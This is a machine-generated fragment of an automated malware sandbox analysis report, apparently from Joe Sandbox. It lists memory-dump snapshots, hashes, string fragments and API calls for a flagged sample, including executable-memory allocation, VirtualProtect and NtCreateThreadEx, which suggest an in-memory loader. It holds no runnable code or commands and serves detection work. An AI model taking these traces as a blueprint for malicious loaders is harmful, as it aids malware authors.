                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: e4fd205be8be518ff8ee15a7eefd05c82a08f3a119519d0578a1bc429abdc2cd
                                                                          • Instruction ID: 2b646a28190f0e88c6315b3b767d61d8d4530dd0d8348b8de1496978f3085d16
                                                                          • Opcode Fuzzy Hash: e4fd205be8be518ff8ee15a7eefd05c82a08f3a119519d0578a1bc429abdc2cd
                                                                          • Instruction Fuzzy Hash: 36F1D1A2D042589BFB208B24DC45BAA7779FF95314F1480FAD40DA7680D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$N;HA$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2812570011
                                                                          • Opcode ID: 77b70b027d2e5bcf2eb44bb76ab8f9f72e0936e6287f72f425d9124e0481c80a
                                                                          • Instruction ID: 5aecc4e88a6fcfd24281f7a5356008496e287d6f9ea95ecd9c215493501c34da
                                                                          • Opcode Fuzzy Hash: 77b70b027d2e5bcf2eb44bb76ab8f9f72e0936e6287f72f425d9124e0481c80a
                                                                          • Instruction Fuzzy Hash: FDE1E0B1E042689BEB24CB14DC45BAAB779FB94310F1440FAD50DA7280D6B96FC1CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: b6c5779366b63110c547fe85047f3b9c9e7b0ac0fd8f116d81ea962163d12dc1
                                                                          • Instruction ID: b35c2b8e7516102df2eee5541017beb1a00c37ce0d949c6fdacae90ee5dc8e5c
                                                                          • Opcode Fuzzy Hash: b6c5779366b63110c547fe85047f3b9c9e7b0ac0fd8f116d81ea962163d12dc1
                                                                          • Instruction Fuzzy Hash: BDD1F4A1D042A89BFB20CB24DC45BAA7779FF95314F1440F9D40DA6680D67D6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: 4506dfedc251115934a421da24aed6761f0a5348bf8de22fb9c5a414617faf87
                                                                          • Instruction ID: f4680cc77d20d21b38a87656a03710198ff3855f3524410e455b6b33184f5e7a
                                                                          • Opcode Fuzzy Hash: 4506dfedc251115934a421da24aed6761f0a5348bf8de22fb9c5a414617faf87
                                                                          • Instruction Fuzzy Hash: 7AD104A1E046A89BFB20CB24DC45BAA7779FF95314F1480FAD40DA6280D67D6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: b4098611df7d40e456501333243ae0d6b67005715ee0c6ed9de95685127fe54a
                                                                          • Instruction ID: ae1f8f97346e9d627921934ed316cae316f1c3a00e7fe3427e786c171c6bd342
                                                                          • Opcode Fuzzy Hash: b4098611df7d40e456501333243ae0d6b67005715ee0c6ed9de95685127fe54a
                                                                          • Instruction Fuzzy Hash: CBD103A1E046A89BF720CB24DC45BAA7779FF95314F1440F9D40DA6280D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: a92a02a20f34535ac0b9458b5580892397ee49375072ef4d9ed3ebb8cf4e43e5
                                                                          • Instruction ID: 0be4551ec12f62a5a7bee768855fd51bf07dfb983ee621ea5ff9249d08d3f89b
                                                                          • Opcode Fuzzy Hash: a92a02a20f34535ac0b9458b5580892397ee49375072ef4d9ed3ebb8cf4e43e5
                                                                          • Instruction Fuzzy Hash: ABC113A1E042A89BF7208B24DC45BAA7B78FF95314F1440FAD44DA7281D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: f66378c8c1bab8c23f2cbafc80a61c37bfe3a0743ed3e12b9a11ba5ef97f6dff
                                                                          • Instruction ID: 3ede47c4daca4c174f251cb6f951c10e4b52f3d3377414568481354136c9c030
                                                                          • Opcode Fuzzy Hash: f66378c8c1bab8c23f2cbafc80a61c37bfe3a0743ed3e12b9a11ba5ef97f6dff
                                                                          • Instruction Fuzzy Hash: 57C1D2A1E042A89BE720CB24DC45BAA7779FF95314F1440F9D40DA6680D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$KCXR$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2296760660
                                                                          • Opcode ID: 0786e39fd52c5280e6206bbf2964671085dabe6894453df27079ef6ead1b60f5
                                                                          • Instruction ID: 356f97270c43eebdb8cb0e68d0ebd66fe8a27e15af51f212f6e625981105364f
                                                                          • Opcode Fuzzy Hash: 0786e39fd52c5280e6206bbf2964671085dabe6894453df27079ef6ead1b60f5
                                                                          • Instruction Fuzzy Hash: 0CB1F2A1E042A89BF720CA24DC45BAA7779FF95314F1480F9D40DA6680D6BE6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: $FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-3207822970
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 2422867632-3193107297
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?), ref: 0083438B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 0-953603593
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?), ref: 0083438B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 426d625fcf153122037d7a66ae85ec5d167ef82e409a7b98a07f87d49cbad5a2
                                                                          • Instruction ID: c2c1495fa8804995f842783a9e407d1448cb17568e2bc5947cc909ca6a1ebedb
                                                                          • Opcode Fuzzy Hash: 426d625fcf153122037d7a66ae85ec5d167ef82e409a7b98a07f87d49cbad5a2
                                                                          • Instruction Fuzzy Hash: E7B1E0A1E042989BFB20CB24DC45BAA7779FF95314F1480FAD40DA6680D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 1652e4b8c6b66cd85deb30cbc9dd59dc4944e11471895870d14e78c48576d4e6
                                                                          • Instruction ID: 226b8a02c59227b394089102b229ab17d1887a336a410a88c21bbc49acb3aa55
                                                                          • Opcode Fuzzy Hash: 1652e4b8c6b66cd85deb30cbc9dd59dc4944e11471895870d14e78c48576d4e6
                                                                          • Instruction Fuzzy Hash: 4AB1D0A1E042989BFB20CA24DC45BAA7779FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 522f3cf6d7507f1f60e46d96c2955aed2b47c5a3e00d21559e54f02edcf3f32a
                                                                          • Instruction ID: 152185a1b5c0f65bf62da9143166ab4cb054ccd2d863255edcd4d17c84208b47
                                                                          • Opcode Fuzzy Hash: 522f3cf6d7507f1f60e46d96c2955aed2b47c5a3e00d21559e54f02edcf3f32a
                                                                          • Instruction Fuzzy Hash: 2AB1D0B1E042989BFB20CA24DC45BAA7779FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: 7fa15f018f33b8ad8750989d09cff491112b24fdde6257e026157953eea6e565
                                                                          • Instruction ID: da0f738fca329fe7bc6f5632370d9341cec264fa9d2bbe195ae162e8e734d284
                                                                          • Opcode Fuzzy Hash: 7fa15f018f33b8ad8750989d09cff491112b24fdde6257e026157953eea6e565
                                                                          • Instruction Fuzzy Hash: 71B1D0A1E042989BFB20CA24DC45BAA7779FF95314F1480F9D40DA6680D6BD6FC18F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 2949231068-4069139063
                                                                          • Opcode ID: 30ae39412df7fa3e190945b92cee27e17d7970d9fe7a9c4dd707e1a33dab4466
                                                                          • Instruction ID: d47e4a3c5e8a61b3bfb06d984711e1f3069a577937a9090fe7b59a438a4d0107
                                                                          • Opcode Fuzzy Hash: 30ae39412df7fa3e190945b92cee27e17d7970d9fe7a9c4dd707e1a33dab4466
                                                                          • Instruction Fuzzy Hash: 654129A1C096E88AFB109A64CC44BE57FB5BF51304F0480EED5C856683D67D4AD98B72
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-4069139063
                                                                          • Opcode ID: 9321c485f48424b0423c89d8a3e83efb775634cddda772d2a2e1727787562694
                                                                          • Instruction ID: 07e430cffdb94876a662719910f5ed32d8d95a9971ff59cd57f156b7070220ff
                                                                          • Opcode Fuzzy Hash: 9321c485f48424b0423c89d8a3e83efb775634cddda772d2a2e1727787562694
                                                                          • Instruction Fuzzy Hash: 82B1E1A1D046A88AEB20CB24DC04BEAB775FF95304F1440F9D44DA7281D6B96EC1CF62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4=7=$L$L$NHAE$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-1619972170
                                                                          • Opcode ID: 82e88adacfb4c745d42cd19544d166a6902193a3b7c3c6a9e578f66dc44ba50a
                                                                          • Instruction ID: ec86b1699a0a9c845669cfa5332c0e3b6aa371be1b508a10672011e150094aff
                                                                          • Opcode Fuzzy Hash: 82e88adacfb4c745d42cd19544d166a6902193a3b7c3c6a9e578f66dc44ba50a
                                                                          • Instruction Fuzzy Hash: 0712F1B1D092A88AE7248B24DC447EABB75FF95304F0480FAD44DA6285E3799FC5CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: b4f6158213ca7193bed9b7104fd994a33eacdc4f10eaaf489d9de6224c9f8434
                                                                          • Instruction ID: ad5f4af99abf79be6dd7e0f589b9f3dcac22d7c7f27dc6d741939438813e936a
                                                                          • Opcode Fuzzy Hash: b4f6158213ca7193bed9b7104fd994a33eacdc4f10eaaf489d9de6224c9f8434
                                                                          • Instruction Fuzzy Hash: FB32C0B1D092688BEB24CB14DC847EABB75FF91304F1481EAD40DA6285D3799FC58F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 14b2a272af5594266abcd9aae0f873e369eeba7dce2c89dd4f77f5262e6b8ed1
                                                                          • Instruction ID: eba6a1217817f58669534aaf1fd829d0b6c80206f5b9f09c8579b066fad8aae0
                                                                          • Opcode Fuzzy Hash: 14b2a272af5594266abcd9aae0f873e369eeba7dce2c89dd4f77f5262e6b8ed1
                                                                          • Instruction Fuzzy Hash: B52215B1D082A88AE7248B24DC847EA7BB5FF95304F1480FAD44DE6285D7799FC58F12
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 0e8a7d0b74383875d5084c0380a4d2e405cefdf0d24b1d607689ad96a0a4cef8
                                                                          • Instruction ID: 3e736cd28bc26e2da6ffbbb3f3982f1ec5dcc80ca58f104d3da2e164b480a949
                                                                          • Opcode Fuzzy Hash: 0e8a7d0b74383875d5084c0380a4d2e405cefdf0d24b1d607689ad96a0a4cef8
                                                                          • Instruction Fuzzy Hash: 000214B1D082A88AEB248B24DC847EABB75FF51314F1480FAD44DA7285D2799FC5CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 840591690a9e79aaa1accbf5c7c3391b1ccf6a9d332fa575bb30f982ec1e7a37
                                                                          • Instruction ID: dda29332eaa255c1b7e082043d6d1d8ed74445667330ecbd95e566b2b0dbeec7
                                                                          • Opcode Fuzzy Hash: 840591690a9e79aaa1accbf5c7c3391b1ccf6a9d332fa575bb30f982ec1e7a37
                                                                          • Instruction Fuzzy Hash: 7B0202B1D082A88AEB248B24DC847EABB75FF55314F0480FAD44DA7285D2799FC58F53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: eee1b99dc534500dd04da8933707b8e5a2e25faad68ec1c28ffe03f858dbf628
                                                                          • Instruction ID: 617765efb616ab739be5d88f6a93f015fcbcd0b274ee48e11b9de6b7c8066ca6
                                                                          • Opcode Fuzzy Hash: eee1b99dc534500dd04da8933707b8e5a2e25faad68ec1c28ffe03f858dbf628
                                                                          • Instruction Fuzzy Hash: 81E115B1C092988AE7248A24DC887EB7B75FF91314F1480FAD44DA6285D3B99FC58F53
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 8$n$n$x
                                                                          • API String ID: 544645111-2129689772
                                                                          • Opcode ID: dd658d19016bcac992c143b4bd4f9a9609bbe9b5ea5392c035b03477fd0653a2
                                                                          • Instruction ID: 0052699430fabc6334d671ad482a5a786128c2226b1ecdf34bf6af3ee105ad1f
                                                                          • Opcode Fuzzy Hash: dd658d19016bcac992c143b4bd4f9a9609bbe9b5ea5392c035b03477fd0653a2
                                                                          • Instruction Fuzzy Hash: 1CE18EB1D042289FEB24CB14DC95BEAB775FB84314F1481EAE90EA7240D6396EC5CF91
                                                                          APIs
